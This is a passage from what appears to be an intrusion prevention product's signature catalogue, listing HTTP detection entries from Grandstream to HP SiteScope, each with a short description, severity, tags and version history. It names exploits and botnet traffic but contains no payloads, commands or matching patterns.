Tags: Any Operating System, Any Hardware, Grandstream, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1326-5242
Last changed: sgpkg-ips-1349-5242
Vulnerability: Grandstream-UCM6200-SQL-Injection-CVE-2020-5722
Description:
Back to top

HTTP_CRL-Graphite-Web-Unsafe-Pickle-Handling-Vulnerability

About this situation: Graphite Web Unsafe Pickle Handling Vulnerability detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Any Hardware, Graphite, CVE2013, Unix not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-570-5211
Vulnerability: Graphite-Web-Unsafe-Pickle-Handling-Vulnerability
Description:
Back to top

HTTP_CRL-GravCMS-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in GravCMS detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GravCMS, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1365-5242
Last changed: sgpkg-ips-1365-5242
Vulnerability: GravCMS-Remote-Command-Execution
Description:
Back to top

HTTP_CRL-Groupwise-ServletManager-Application-Admin

About this situation: Possible administrative access with default username and password
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Novell GroupWise, CVE2001, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-867-5242
Vulnerability: HTTP-Groupwise-ServletManager-Application-Admin
Description:
Back to top

HTTP_CRL-Grum-Spambot

About this situation: Grum spambot command and control channel communication detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Grum spambot, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-270-3038
Last changed: sgpkg-ips-270-3038
Vulnerability: Grum-Spambot
Description:
Back to top

HTTP_CRL-Guestserver-Cgi-System-Compromise

About this situation: Access to vulnerable guestbook.cgi script
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Lars Ellingsen's Guestserver, CVE2001, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-1607-5242
Vulnerability: HTTP-Guestserver-Cgi-System-Compromise
Description:
Back to top

HTTP_CRL-Gumblar-Bot-Traffic

About this situation: Gumblar bot traffic detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Gumblar-Bot
Description:
Back to top

HTTP_CRL-Guppy-Error-Php-Server-Remote-Addr-Php-Command-Execution

About this situation: Detects Guppy php injection exploits
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Guppy, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-48-1210
Last changed: sgpkg-ips-514-5211
Vulnerability: HTTP-Guppy-Error-Php-Server-Remote-Addr-Php-Command-Execution
Description:
Back to top

HTTP_CRL-H0lyGh0st-Ransomware-C2-Traffic

About this situation: H0lyGh0st ransomware command and control traffic was detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1486-5242
Last changed: sgpkg-ips-1486-5242
Vulnerability: H0lyGh0st-Ransomware-C2-Traffic
Description:
Back to top

HTTP_CRL-H2-Database-Console-Jdbcutils-JNDI-Injection

About this situation: An attempt to exploit a vulnerability in H2 Database Project H2 Database detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, H2 Database, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1429-5242
Last changed: sgpkg-ips-1429-5242
Vulnerability: H2-Database-Console-Jdbcutils-JNDI-Injection
Description:
Back to top

HTTP_CRL-H2-Database-JDBC-URL-Arbitrary-Code-Execution

About this situation: An attempt to exploit a vulnerability in H2 Database Project H2 Database detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, H2 Database, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1437-5242
Last changed: sgpkg-ips-1437-5242
Vulnerability: H2-Database-JDBC-URL-Arbitrary-Code-Execution
Description:
Back to top

HTTP_CRL-H2-Web-Interface-Create-Alias-RCE

About this situation: An attempt to exploit a vulnerability in H2 Database detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, H2 Database, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1725-5242
Last changed: sgpkg-ips-1725-5242
Vulnerability: H2-Web-Interface-Create-Alias-RCE
Description:
Back to top

HTTP_CRL-Hak5-WiFi-Pineapple-Preconfiguration-Command-Injection

About this situation: An attempt to exploit a Hak5 WiFi Pineapple Preconfiguration Command Injection vulnerability detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Hak5, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-975-5242
Last changed: sgpkg-ips-1272-5242
Vulnerability: Hak5-WiFi-Pineapple-Preconfiguration-Command-Injection
Description:
Back to top

HTTP_CRL-Ham-Backdoor-Request

About this situation: Traffic that resembles Ham Backdoor communication detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-859-5242
Last changed: sgpkg-ips-1110-5242
Vulnerability: Ham-Backdoor
Description:
Back to top

HTTP_CRL-Hancitor-C2-Traffic

About this situation: Hancitor C2 traffic was detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1119-5242
Vulnerability: Hancitor-C2-Traffic
Description:
Back to top

HTTP_CRL-Hanove.F-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-694-5211
Vulnerability: Win32.Trojan.Hanove.F-Botnet
Description:
Back to top

HTTP_CRL-Hashicorp-Consul-Rexec-RCE

About this situation: An attempt to exploit a vulnerability in Hashicorp Consul detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Hashicorp Consul, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1197-5242
Last changed: sgpkg-ips-1197-5242
Vulnerability: Hashicorp-Consul-Rexec-RCE
Description:
Back to top

HTTP_CRL-Hastymail-Remote-Command-Execution

About this situation: An attempt to exploit a Hastymail Remote Command Execution vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Hastymail, CVE2011, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1014-5242
Vulnerability: Hastymail-Remote-Command-Execution
Description:
Back to top

HTTP_CRL-Heur.LP-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-693-5211
Last changed: sgpkg-ips-693-5211
Vulnerability: Win32.Trojan.Heur-Botnet
Description:
Back to top

HTTP_CRL-HeurGeneric-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-691-5211
Vulnerability: Win32.Trojan.HeurGeneric-Botnet
Description:
Back to top

HTTP_CRL-Hewlett-Packard-Enterprise-Vertica-Validateadminconfig-Remote-Command-Injection

About this situation: An attempt to exploit a vulnerability in HPE Vertica detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, HP Enterprise Vertica, CVE2016, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-1332-5242
Vulnerability: Hewlett-Packard-Enterprise-Vertica-Validateadminconfig-Remote-Command-Injection
Description:
Back to top

HTTP_CRL-HomeMatic-CCU2-RCE

About this situation: An attempt to exploit a vulnerability in HomeMatic CCU2 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HomeMatic, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1322-5242
Last changed: sgpkg-ips-1596-5242
Vulnerability: HomeMatic-CCU2-RCE
Description:
Back to top

HTTP_CRL-Horde-Backdoor-Code-Execution

About this situation: An attempt to exploit a Horde Backdoor Code Execution vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Horde, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-710-5211
Last changed: sgpkg-ips-710-5211
Vulnerability: Horde-Backdoor-Code-Execution
Description:
Back to top

HTTP_CRL-Horde-CSV-Import-Arbitrary-PHP-Code-Execution

About this situation: An attempt to exploit a vulnerability in Horde detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Horde, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1237-5242
Last changed: sgpkg-ips-1781-5242
Vulnerability: Horde-CSV-Import-Arbitrary-PHP-Code-Execution
Description:
Back to top

HTTP_CRL-Horde-Webmail-Form-File-Upload

About this situation: An attempt to exploit a vulnerability in Horde Webmail detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Horde, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1197-5242
Last changed: sgpkg-ips-1197-5242
Vulnerability: Horde-Webmail-Form-File-Upload
Description:
Back to top

HTTP_CRL-Horde-Webmail-Turba_Factory_Driver-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Horde Webmail detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Horde, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1478-5242
Last changed: sgpkg-ips-1478-5242
Vulnerability: Horde-Webmail-Turba_Factory_Driver-Insecure-Deserialization
Description:
Back to top

HTTP_CRL-Hotclip.A-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-694-5211
Vulnerability: Win32.Adware.Hotclip.A-Botnet
Description:
Back to top

HTTP_CRL-HP-Data-Protector-Media-Operations-SignInName-Parameter-Overflow

About this situation: An attempt to exploit a denial of service vulnerability in HP Data Protector Media Operations detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, HP Data Protector Media Operations, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-367-4219
Last changed: sgpkg-ips-1013-5242
Vulnerability: HP-Data-Protector-Media-Operations-SignInName-Parameter-Overflow
Description:
Back to top

HTTP_CRL-HP-Intelligent-Management-Center-BIMS-Uploadservlet-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in HP IMC Branch Intelligent Management System Software Module (BIMS) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP IMC Branch Intelligent Management System Software Module, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-547-5211
Last changed: sgpkg-ips-547-5211
Vulnerability: HP-Intelligent-Management-Center-BIMS-Uploadservlet-Arbitrary-File-Upload
Description:
Back to top

HTTP_CRL-HP-Network-Node-Manager-I-Multiple-Cross-Site-Scripting-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in HP Network Node Manager i (NNMi) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP Network Node Manager i, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-427-4219
Last changed: sgpkg-ips-597-5211
Vulnerability: HP-Network-Node-Manager-I-Multiple-Cross-Site-Scripting-Vulnerabilities
Description:
Back to top

HTTP_CRL-HP-OpenView-Network-Node-Manager-Getcvdata.exe-BOF

About this situation: Specially crafted HTTP request causes Buffer Overflow
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2008, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-199-2032
Last changed: sgpkg-ips-352-4219
Vulnerability: HP-OpenView-Network-Node-Manager-Getcvdata.exe-Buffer-Overflow
Description:
Back to top

HTTP_CRL-HP-OpenView-Network-Node-Manager-Invalid-Option-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP OpenView Network Node Manager detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2010, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-317-4219
Last changed: sgpkg-ips-1013-5242
Vulnerability: HP-OpenView-Network-Node-Manager-Invalid-Option-Buffer-Overflow
Description:
Back to top

HTTP_CRL-HP-OpenView-Network-Node-Manager-Jovgraph-Argument-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in HP OpenView Network Node Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-321-4219
Last changed: sgpkg-ips-439-4219
Vulnerability: HP-OpenView-Network-Node-Manager-Jovgraph-Argument-Buffer-Overflow
Description:
Back to top

HTTP_CRL-HP-OpenView-Network-Node-Manager-Jovgraph-Displaywidth-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP OpenView Network Node Manager detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2011, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-373-4219
Last changed: sgpkg-ips-1013-5242
Vulnerability: HP-OpenView-Network-Node-Manager-Jovgraph-Displaywidth-Buffer-Overflow
Description:
Back to top

HTTP_CRL-HP-OpenView-Network-Node-Manager-netmon.exe-BOF

About this situation: An attempt to exploit a stack buffer overflow vulnerability in the HP OpenView Network Node Manager library ov.dll detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-307-4219
Last changed: sgpkg-ips-1747-5242
Vulnerability: HP-OpenView-Network-Node-Manager-netmon.exe-BOF
HP-OpenView-Network-Node-Manager-execvp_nc-BOF
Description:
Back to top

HTTP_CRL-HP-OpenView-Network-Node-Manager-Nnmrptconfig-Nameparams-Text1-BOF

About this situation: An attempt to exploit a vulnerability in HP OpenView Network Node Manager detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2011, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-372-4219
Last changed: sgpkg-ips-1013-5242
Vulnerability: HP-OpenView-Network-Node-Manager-Nnmrptconfig-Nameparams-Text1-Buffer-Overflow
HP-OpenView-Network-Node-Manager-Nameparams-Buffer-Overflow
Description:
Back to top

HTTP_CRL-HP-OpenView-Network-Node-Manager-Nnmrptconfig-Template-Format-String

About this situation: An attempt to exploit a vulnerability in HP OpenView Network Node Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-372-4219
Last changed: sgpkg-ips-926-5242
Vulnerability: HP-OpenView-Network-Node-Manager-Nnmrptconfig-Template-Format-String
Description:
Back to top

HTTP_CRL-HP-OpenView-Network-Node-Manager-Ov.dll-ovbuildpath-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP OpenView Network Node Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-438-4219
Last changed: sgpkg-ips-439-4219
Vulnerability: HP-OpenView-Network-Node-Manager-Ov.dll-ovbuildpath-Buffer-Overflow
Description:
Back to top

HTTP_CRL-HP-OpenView-Network-Node-Manager-ovet_demandpoll.exe-Format-String

About this situation: An attempt to exploit a format string vulnerability in the HP OpenView Network Node Manager application ovet_demandpoll.exe detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-316-4219
Last changed: sgpkg-ips-439-4219
Vulnerability: HP-OpenView-Network-Node-Manager-ovet_demandpoll.exe-Format-String
Description:
Back to top

HTTP_CRL-HP-OpenView-Network-Node-Manager-Ovlogin.exe-Buffer-Overflow

About this situation: Detected an attempt to exploit a vulnerability in HP OpenView Network Node Manager
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2009, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-272-4219
Last changed: sgpkg-ips-325-4219
Vulnerability: HP-OpenView-Network-Node-Manager-Ovlogin.exe-Buffer-Overflow
HP-OpenView-Network-Node-Manager-ovsessionmgr.exe-Buffer-Overflow
Description:
Back to top

HTTP_CRL-HP-OpenView-Network-Node-Manager-OvWebHelp.exe-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in the HP OpenView Network Node Manager CGI process OvWebHelp.exe detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2009, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-289-4219
Last changed: sgpkg-ips-1013-5242
Vulnerability: HP-OpenView-Network-Node-Manager-OvWebHelp.exe-Buffer-Overflow
Description:
Back to top

HTTP_CRL-HP-OpenView-Network-Node-Manager-ovwebsnmpsrv.exe-OVwSelection-BOF

About this situation: An attempt to exploit a buffer overflow vulnerability in the HP OpenView Network Node Manager program ovwebsnmpsrv.exe detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2009, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-289-4219
Last changed: sgpkg-ips-439-4219
Vulnerability: HP-OpenView-Network-Node-Manager-ovwebsnmpsrv.exe-OVwSelection-BOF
Description:
Back to top

HTTP_CRL-HP-OpenView-Network-Node-Manager-Rping-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP OpenView Network Node Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-1740-5242
Vulnerability: HP-OpenView-Network-Node-Manager-Rping-Stack-Buffer-Overflow
Description:
Back to top

HTTP_CRL-HP-OpenView-Network-Node-Manager-Schd_select1-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in HP OpenView Network Node Manager (OV NNM) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-439-4219
Vulnerability: HP-OpenView-Network-Node-Manager-Schd_select1-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-HP-OpenView-Network-Node-Manager-Snmp.exe-Oid-Variable-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Hewlett-Packard OpenView Network Node Manager (OV NNM) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, HP OpenView Network Node Manager, CVE2009, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-439-4219
Vulnerability: HP-OpenView-Network-Node-Manager-Snmp.exe-Oid-Variable-Buffer-Overflow
Description:
Back to top

HTTP_CRL-HP-OpenView-NNM-getnnmdata.exe-Cgi-Hostname-Parameter-BOF

About this situation: An attempt to exploit a buffer overflow vulnerability in the HP OpenView Network Node Manager CGI application getnnmdata.exe detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2010, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-305-4219
Last changed: sgpkg-ips-1740-5242
Vulnerability: HP-OpenView-NNM-getnnmdata.exe-Cgi-Hostname-Parameter-BOF
Description:
Back to top

HTTP_CRL-HP-OpenView-NNM-ovutil.dll-getProxiedStorageAddress-BOF

About this situation: An attempt to exploit a buffer overflow vulnerability in HP OpenView Network Node Manager ovwebsnmpsrv.exe detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-321-4219
Last changed: sgpkg-ips-439-4219
Vulnerability: HP-OpenView-NNM-ovutil.dll-getProxiedStorageAddress-BOF
Description:
Back to top

HTTP_CRL-HP-OpenView-NNM-ovutil.dll-Stringtoseconds-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP OpenView Network Node Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-439-4219
Vulnerability: HP-OpenView-NNM-ovutil.dll-Stringtoseconds-Buffer-Overflow
Description:
Back to top

HTTP_CRL-HP-OpenView-NNM-Snmpviewer.exe-Cgi-Stack-Buffer-Overflow

About this situation: An attempt to exploit a stack buffer overflow vulnerability in the HP OpenView Network Node Manager CGI application snmpviewer.exe detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2010, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-307-4219
Last changed: sgpkg-ips-1013-5242
Vulnerability: HP-OpenView-NNM-Snmpviewer.exe-Cgi-Stack-Buffer-Overflow
Description:
Back to top

HTTP_CRL-HP-OpenView-Nnmrptconfig-Network-Node-Manager-Schd-And-Nameparams-BOF

About this situation: An attempt to exploit a vulnerability in HP OpenView Network Node Manager detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2011, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-374-4219
Last changed: sgpkg-ips-1583-5242
Vulnerability: HP-OpenView-Network-Node-Manager-Nnmrptconfig-Schdparams-And-Nameparams-BOF
Description:
Back to top

HTTP_CRL-HP-OpenView-Nnmrptconfig-Network-Node-Manager-Schd-And-Nameparams-BOF-2

About this situation: A possible attempt to exploit a vulnerability in HP OpenView Network Node Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2011, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-430-4219
Last changed: sgpkg-ips-439-4219
Vulnerability: HP-OpenView-Network-Node-Manager-Nnmrptconfig-Schdparams-And-Nameparams-BOF
Description:
Back to top

HTTP_CRL-HP-Power-Manager-Administration-Web-Server-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Power Manager detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, HP Power Manager, CVE2009, CVE2010, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-374-4219
Last changed: sgpkg-ips-1013-5242
Vulnerability: HP-Power-Manager-Login-Buffer-Overflow
HP-Power-Manager-Administration-Web-Server-Stack-Buffer-Overflow
Description:
Back to top

HTTP_CRL-HP-Power-Manager-Form-Export-Logs-Buffer-Overflow

About this situation: An attempt to exploit buffer overflow vulnerability in HP Power Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP Power Manager, CVE2009, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-278-4219
Last changed: sgpkg-ips-325-4219
Vulnerability: HP-Power-Manager-Form-Export-Logs-Buffer-Overflow
Description:
Back to top

HTTP_CRL-HP-Power-Manager-Form-Export-Logs-Directory-Traversal

About this situation: An attempt to exploit a directory traversal vulnerability in HP Power Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP Power Manager, CVE2009, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-279-4219
Last changed: sgpkg-ips-325-4219
Vulnerability: HP-Power-Manager-Form-Export-Logs-Directory-Traversal
Description:
Back to top

HTTP_CRL-HP-Sitescope-Emailservlet-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in HP SiteScope detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP SiteScope, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
